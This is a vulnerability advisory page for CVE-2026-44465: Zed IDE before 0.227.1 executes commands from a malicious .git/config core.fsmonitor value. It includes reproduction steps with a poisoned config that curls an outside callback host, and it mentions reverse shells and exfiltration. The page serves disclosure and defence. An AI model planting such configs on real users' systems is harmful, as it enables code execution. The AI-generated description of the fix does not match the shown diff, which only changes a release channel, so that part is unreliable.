CVE-2026-44465
Description
Zed is a code editor. Prior to 0.227.1, Zed IDE executes arbitrary commands when opening a folder with a malicious .git/config file that abuses the core.fsmonitor Git configuration option. This allows an attacker to achieve Remote Code Execution (RCE) when a victim open a folder in untrusted mode. This vulnerability is fixed in 0.227.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Zed IDE before 0.227.1 executes arbitrary commands when opening a folder with a malicious .git/config file abusing core.fsmonitor, enabling RCE.
Vulnerability
Zed IDE versions prior to 0.227.1 are vulnerable to arbitrary command execution when a user opens a folder containing a malicious .git/config file. The vulnerability lies in the way Zed invokes Git operations in untrusted mode: it respects the repository-local Git configuration, including the core.fsmonitor option, which specifies a command to be executed by Git. Zed does not sanitize or restrict this configuration value before running Git commands, allowing an attacker to inject arbitrary shell commands. The attack requires that the victim opens the folder in Zed's untrusted mode. Affected versions include all releases before 0.227.1, with testing confirmed on latest stable and v0.223.3 preview [1].
Exploitation
An attacker crafts a Git repository with a malicious .git/config file containing a core.fsmonitor directive set to an arbitrary command (e.g., a curl callback to an attacker-controlled server). The attacker then distributes this repository to the victim via Git hosting platforms, shared drives, or archives. When the victim opens the folder in Zed IDE, Zed performs Git operations that trigger the execution of the fsmonitor command. No additional user interaction beyond opening the folder is required; the vulnerability is triggered automatically [1]. Proof-of-concept steps include initializing a Git repository, editing .git/config to include the malicious fsmonitor value, and opening the folder in Zed [1].
Impact
Successful exploitation allows arbitrary code execution with the privileges of the user running Zed. The attacker can execute any shell command, such as establishing a reverse shell, exfiltrating data, or deploying malware. This results in full compromise of the victim's system. The attack vector is highly effective because it requires no authentication, network position manipulation, or user interaction beyond opening the project folder. The vulnerability is classified as high severity, with a CVSS v3 score of 8.6 [1].
Mitigation
The vulnerability is fixed in Zed version 0.227.1, released on the same date as the advisory (2026-05-28) [1]. Users should immediately update to this version or later. There are no known workarounds for unpatched versions; the only mitigation is to avoid opening untrusted folders in Zed until the update is applied. The vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 28, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2<0.227.1+ 1 more
- (no CPE)range: <0.227.1
- (no CPE)range: <0.227.1
Patches
19f9b707d39d6v0.227.x stable
1 file changed · +1 −1
crates/zed/RELEASE_CHANNEL+1 −1 modified@@ -1 +1 @@ -preview \ No newline at end of file +stable \ No newline at end of file
Vulnerability mechanics
Root cause
"Zed does not sanitize or restrict the core.fsmonitor Git configuration option before running Git commands, allowing a malicious .git/config file to specify an arbitrary shell command that Git executes."
Attack vector
An attacker creates a Git repository with a poisoned .git/config file that sets core.fsmonitor to a malicious command (e.g., a curl callback or reverse shell) [ref_id=1]. When a victim opens this folder in Zed IDE (even in untrusted mode), Zed invokes Git operations that respect the repository-local configuration, causing Git to execute the attacker-controlled fsmonitor command [ref_id=1]. The attack requires no additional interaction beyond opening the project folder, and the command runs with the victim's user privileges [ref_id=1]. The attacker can distribute the poisoned repository via Git hosting platforms, shared drives, or archives [ref_id=1].
Affected code
The advisory does not specify exact file paths or functions. The vulnerability lies in how Zed invokes Git operations on a repository without sanitizing the repository-local .git/config file, specifically the core.fsmonitor option [ref_id=1]. The patch is identified by commit 9f9b707d39d62468d4cdaed2d8eb95a847da4cf9 [patch_id=2961923].
What the fix does
The patch in commit 9f9b707d39d62468d4cdaed2d8eb95a847da4cf9 [patch_id=2961923] addresses the vulnerability by ensuring Zed does not honor the core.fsmonitor configuration from untrusted repositories. The advisory states the fix is included in version 0.227.1 [ref_id=1]. No further details about the specific code change are available from the supplied bundle beyond the commit hash and version.
Preconditions
- inputVictim must open a folder containing a malicious .git/config file with a crafted core.fsmonitor value.
- authNo authentication required; the attack works in untrusted mode.
- networkNo network precondition; the payload can be local or reach outbound (e.g., curl to webhook.site).
Reproduction
1. Create a folder with a poisoned .git/config: `mkdir /tmp/evil-repo && cd /tmp/evil-repo && git init` [ref_id=1]. 2. Edit .git/config to include: `[core] fsmonitor = "curl https://webhook.site/<your-id>/zed/git/config"` [ref_id=1]. 3. Open the folder in Zed IDE [ref_id=1]. 4. Observe the callback on webhook.site confirming arbitrary command execution [ref_id=1].
Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.